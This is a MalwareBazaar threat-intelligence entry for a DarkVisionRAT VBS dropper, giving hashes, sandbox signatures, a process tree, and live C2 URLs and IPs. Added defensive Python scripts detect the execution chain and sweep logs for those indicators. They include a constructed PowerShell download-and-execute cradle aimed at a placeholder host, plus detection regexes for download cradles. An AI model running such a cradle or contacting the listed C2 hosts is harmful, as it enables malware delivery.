MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 95a67324a3b360de5e1012587af185aa511e37a347c45ff0ca0a897ca95d25a8. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



DarkVisionRAT


Vendor detections: 11



SHA256 hash: 95a67324a3b360de5e1012587af185aa511e37a347c45ff0ca0a897ca95d25a8
SHA3-384 hash: fe99f366a08c7302b596cf035d611cd08955356f7bce51338cf1ae5a9644ba8a54df2c835b6c3620e843d421ccedf08b
SHA1 hash: 8fbdfa518e03676bdb12e5249bb4b965dd4cdbea
MD5 hash: 27eaadd9646703a7ad6ef2563f0bffd8
humanhash: skylark-nuts-winter-four
File name: Documents of Inquiry.vbs
Signature: DarkVisionRAT
File size: 1'177'326 bytes
First seen: 2026-02-12 14:20:44 UTC
Last seen: Never
File type: Visual Basic Script (vbs)
MIME type: text/plain
ssdeep: 384:D7jGihHQnSg2By50zgKdrIumFsjZlQMZ18:d8
Threatray: 42 similar samples on MalwareBazaar
TLSH: T1D7451665074983C3BC44DFA98A354C0403FCF93A4F3AC699D1AA64FA7B0B43955B768B
Magika: txt
Reporter: James_inthe_box
Tags: DarkVisionRAT exe vbs

Intelligence


File Origin
# of uploads: 1
# of downloads: 161
Origin country: US

Vendor Threat Intelligence

No detections

Verdict: Malicious
Score: 91.7%
Tags: obfuscate xtreme blic

Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: anti-vm base64 fingerprint obfuscated powershell

Verdict: Malicious
File Type: vbs
First seen: 2026-02-12T05:38:00Z UTC
Last seen: 2026-02-13T17:23:00Z UTC
Hits: ~100
Detections: Trojan.JS.SAgent.sb HEUR:Trojan.Script.Generic
Result
Threat name: DarkVision Rat
Detection: malicious
Classification: troj.expl.evad
Score: 100 / 100
Signature
Antivirus detection for URL or domain
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Creates processes via WMI
Found evasive API chain (may stop execution after checking mutex)
Found malware configuration
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Malicious sample detected (through community Yara rule)
Modifies the context of a thread in another process (thread injection)
Multi AV Scanner detection for submitted file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Sigma detected: WScript or CScript Dropper
Suricata IDS alerts for network traffic
Suspicious execution chain found
Suspicious powershell command line found
Unusual module load detection (module proxying)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected DarkVision Rat
Yara detected Powershell download and execute
Yara detected UAC Bypass using CMSTP
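The Sigma and sandbox signatures above describe a single execution chain: wscript.exe runs a VBS out of C:\Users\Public\Downloads, starts powershell.exe with an execution-policy bypass and an encoded command that uses Invoke-WebRequest and FromBase64String, and that PowerShell process then starts an unexpected child. The script below is an added example, not code from MalwareBazaar or from any of the sandbox vendors, that applies those checks to Sysmon-style process-creation records. The record layout, the constructed events, the placeholder host example.invalid and the list of "unexpected" PowerShell children are assumptions made for the example; the -enc payload is decoded so an analyst can read what it hid.

```python
"""Flag the wscript.exe -> powershell.exe chain seen in this sample.

Added example. The event layout mirrors Sysmon Event ID 1 fields, but every
record below is constructed, not real telemetry.
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Folders a "script interpreter from suspicious folder" rule looks at; the
# sample's second stage ran from C:\Users\Public\Downloads.
SUSPICIOUS_DIRS = ("c:\\users\\public\\", "c:\\programdata\\", "c:\\windows\\temp\\")
# Assumption for this example: system binaries powershell.exe rarely spawns
# legitimately (appidtel.exe was the injection target in the sandbox report).
UNEXPECTED_PS_CHILDREN = {"appidtel.exe", "cmstp.exe", "mshta.exe", "regsvr32.exe",
                          "wscript.exe", "cscript.exe"}

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob
ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
EP_BYPASS = re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I)
B64_DECODE = re.compile(r"frombase64string", re.I)
DOWNLOAD_CRADLE = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient", re.I)


@dataclass
class ProcEvent:
    image: str          # full path of the created process
    command_line: str
    parent_image: str   # full path of the parent process


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of an -EncodedCommand argument (base64 of UTF-16LE)."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(ev: ProcEvent) -> List[str]:
    """Return the detections that fire for one process-creation event, in rule order."""
    flags: List[str] = []
    img, parent, cmd = basename(ev.image), basename(ev.parent_image), ev.command_line
    if img in SCRIPT_HOSTS and any(d in cmd.lower() for d in SUSPICIOUS_DIRS):
        flags.append("script_host_from_suspicious_folder")
    if img in POWERSHELL:
        if parent in SCRIPT_HOSTS:
            flags.append("wscript_spawns_powershell")
        if EP_BYPASS.search(cmd):
            flags.append("executionpolicy_bypass")
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            flags.append("encoded_command")
        # Inspect the decoded script when there is one, else the raw command line.
        effective = decoded if decoded is not None else cmd
        if B64_DECODE.search(effective):
            flags.append("frombase64string")
        if DOWNLOAD_CRADLE.search(effective):
            flags.append("download_cradle")
    if parent in POWERSHELL and img in UNEXPECTED_PS_CHILDREN:
        flags.append("suspicious_powershell_child")
    return flags


# Constructed stage-2 script, encoded the way -enc expects (UTF-16LE, base64).
STAGE2 = ("$img=(Invoke-WebRequest -UseBasicParsing -Uri https://example.invalid/optimized_MSI.png).Content;"
          "$bytes=[Convert]::FromBase64String([Text.Encoding]::ASCII.GetString($img));"
          "IEX ([Text.Encoding]::UTF8.GetString($bytes))")
ENCODED = base64.b64encode(STAGE2.encode("utf-16-le")).decode()
PS_PATH = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [  # constructed, not real telemetry
    ProcEvent("C:\\Windows\\System32\\wscript.exe",
              '"C:\\Windows\\System32\\wscript.exe" "C:\\Users\\Public\\Downloads\\uFcOfTYYGH.vbs"',
              "C:\\Windows\\explorer.exe"),
    ProcEvent(PS_PATH, f"powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -enc {ENCODED}",
              "C:\\Windows\\System32\\wscript.exe"),
    ProcEvent("C:\\Windows\\System32\\appidtel.exe", "appidtel.exe", PS_PATH),
    ProcEvent(PS_PATH, "powershell.exe -NoProfile -Command Get-Process", "C:\\Windows\\explorer.exe"),  # benign
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(basename(ev.image), "<-", basename(ev.parent_image), analyze(ev))
        decoded = decode_encoded_command(ev.command_line)
        if decoded:
            print("  decoded:", decoded)
```

The encoded command is inspected after decoding; matching FromBase64String or Invoke-WebRequest on the raw command line alone would miss anything hidden behind -enc, which is exactly the case this sample presents.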
Behaviour
Behavior Graph (ID 1868463; sample: Documents of Inquiry.vbs; start date: 12/02/2026; architecture: WINDOWS; score: 100)

Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 16 other signatures

Process tree:
  wscript.exe (submitted VBS)
    signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage); 2 other signatures
    powershell.exe
      network: 77.83.39.177:80 (DINET-ASRU, Ukraine); uniworldrivercruises-co.uk = 176.123.0.55:443 (ALEXHOSTMD, Moldova, Republic of)
      dropped: C:\Users\Public\Downloads\uFcOfTYYGH (JPEG)
      signatures: Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); Injects a PE file into a foreign processes
      appidtel.exe
        network: toolz.3utilities.com = 104.37.175.235:3321 (MAJESTIC-HOSTING-01US, United States)
        signatures: Found evasive API chain (may stop execution after checking mutex); Unusual module load detection (module proxying)
      conhost.exe
  powershell.exe (second instance, started from the sample)
    dropped: C:\Users\Public\Downloads\uFcOfTYYGH.vbs (Unicode)
    wscript.exe
Threat name: Script-WScript.Trojan.Generic
Status: Suspicious
First seen: 2026-02-12 14:20:53 UTC
File Type: Binary
AV detection: 6 of 24 (25.00%)
Threat level: 5/5
Result
Malware family: n/a
Score: 10/10
Tags: execution
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Badlisted process makes network request
Command and Scripting Interpreter: PowerShell
Process spawned unexpected child process
Malware Config
Dropper Extraction: https://uniworldrivercruises-co.uk/optimized_MSI.png
Please note that we are no longer able to provide a coverage score for Virus Total.
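The network indicators in the sandbox report (the dropper URL above, the two hostnames, and the three IP:port pairs) together with the file hashes at the top of the entry are what a responder would sweep for. The script below is an added example, not code from MalwareBazaar or from any vendor, that runs that sweep over a constructed key=value log format. The log lines, the example.invalid URL, and the bytes checked against the hashes are made up for the example; only the indicators themselves come from this page.

```python
"""Sweep DNS, proxy and connection logs, plus a file, for this entry's IOCs.

Added example. The log format and every log line below are constructed.
"""
import hashlib
from dataclasses import dataclass
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Indicators copied from this MalwareBazaar entry and its sandbox report.
IOC_HASHES = {
    "md5": "27eaadd9646703a7ad6ef2563f0bffd8",
    "sha1": "8fbdfa518e03676bdb12e5249bb4b965dd4cdbea",
    "sha256": "95a67324a3b360de5e1012587af185aa511e37a347c45ff0ca0a897ca95d25a8",
    "sha3_384": "fe99f366a08c7302b596cf035d611cd08955356f7bce51338cf1ae5a9644ba8a54df2c835b6c3620e843d421ccedf08b",
}
IOC_DOMAINS = {"uniworldrivercruises-co.uk", "toolz.3utilities.com"}
IOC_URLS = {"https://uniworldrivercruises-co.uk/optimized_MSI.png"}
IOC_SOCKETS = {("176.123.0.55", 443), ("77.83.39.177", 80), ("104.37.175.235", 3321)}
IOC_IPS = {ip for ip, _ in IOC_SOCKETS}


@dataclass
class Hit:
    line_no: int
    kind: str        # domain | url | socket | ip
    indicator: str
    host: str        # endpoint named in the log line


def parse_kv(line: str) -> Dict[str, str]:
    """Split a 'timestamp source key=value ...' line into its key=value fields."""
    fields: Dict[str, str] = {}
    for tok in line.split():
        key, sep, val = tok.partition("=")
        if sep:
            fields[key] = val
    return fields


def domain_matches(name: str) -> Optional[str]:
    """Match an IOC domain or any subdomain of it; a trailing dot is tolerated."""
    q = name.lower().rstrip(".")
    for d in IOC_DOMAINS:
        if q == d or q.endswith("." + d):
            return d
    return None


def scan_line(line_no: int, line: str) -> List[Hit]:
    f = parse_kv(line)
    host = f.get("host", "?")
    hits: List[Hit] = []
    if "qname" in f:                       # DNS query
        d = domain_matches(f["qname"])
        if d:
            hits.append(Hit(line_no, "domain", d, host))
    if "url" in f:                         # proxy request
        if f["url"] in IOC_URLS:
            hits.append(Hit(line_no, "url", f["url"], host))
        else:
            d = domain_matches(urlsplit(f["url"]).hostname or "")
            if d:
                hits.append(Hit(line_no, "domain", d, host))
    if "dst" in f:                         # connection record
        sock = (f["dst"], int(f.get("dport", "0")))
        if sock in IOC_SOCKETS:
            hits.append(Hit(line_no, "socket", f"{sock[0]}:{sock[1]}", host))
        elif sock[0] in IOC_IPS:           # known IP, unlisted port: lower fidelity
            hits.append(Hit(line_no, "ip", sock[0], host))
    return hits


def scan(lines: List[str]) -> List[Hit]:
    return [h for i, line in enumerate(lines, 1) for h in scan_line(i, line)]


def hash_matches(data: bytes) -> List[str]:
    """Return the hash algorithms whose digest of data equals this entry's value."""
    return sorted(a for a, h in IOC_HASHES.items() if hashlib.new(a, data).hexdigest() == h)


SAMPLE_LOGS = [  # constructed log lines
    "2026-02-12T14:21:03Z dns host=WS01 qname=uniworldrivercruises-co.uk qtype=A",
    "2026-02-12T14:21:04Z proxy host=WS01 method=GET url=https://uniworldrivercruises-co.uk/optimized_MSI.png status=200",
    "2026-02-12T14:21:07Z dns host=WS01 qname=toolz.3utilities.com qtype=A",
    "2026-02-12T14:21:08Z conn host=WS01 dst=104.37.175.235 dport=3321 proto=tcp",
    "2026-02-12T14:21:09Z conn host=WS07 dst=77.83.39.177 dport=8080 proto=tcp",
    "2026-02-12T14:21:10Z proxy host=WS02 method=GET url=https://example.invalid/index.html status=200",
    "2026-02-12T14:21:11Z dns host=WS03 qname=cdn.uniworldrivercruises-co.uk. qtype=A",
]

if __name__ == "__main__":
    for h in scan(SAMPLE_LOGS):
        print(f"line {h.line_no}: {h.kind} {h.indicator} on {h.host}")
    print("hash match on placeholder bytes:", hash_matches(b"placeholder, not the sample"))
```

toolz.3utilities.com is a dynamic-DNS hostname, so 104.37.175.235 need not stay current; the sweep therefore matches the hostname in DNS logs independently of the socket, and a hit on a known IP with an unlisted port (line 5) is reported as a lower-fidelity "ip" hit rather than a "socket" hit.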

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: ClamAV_Emotet_String_Aggregate

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Comments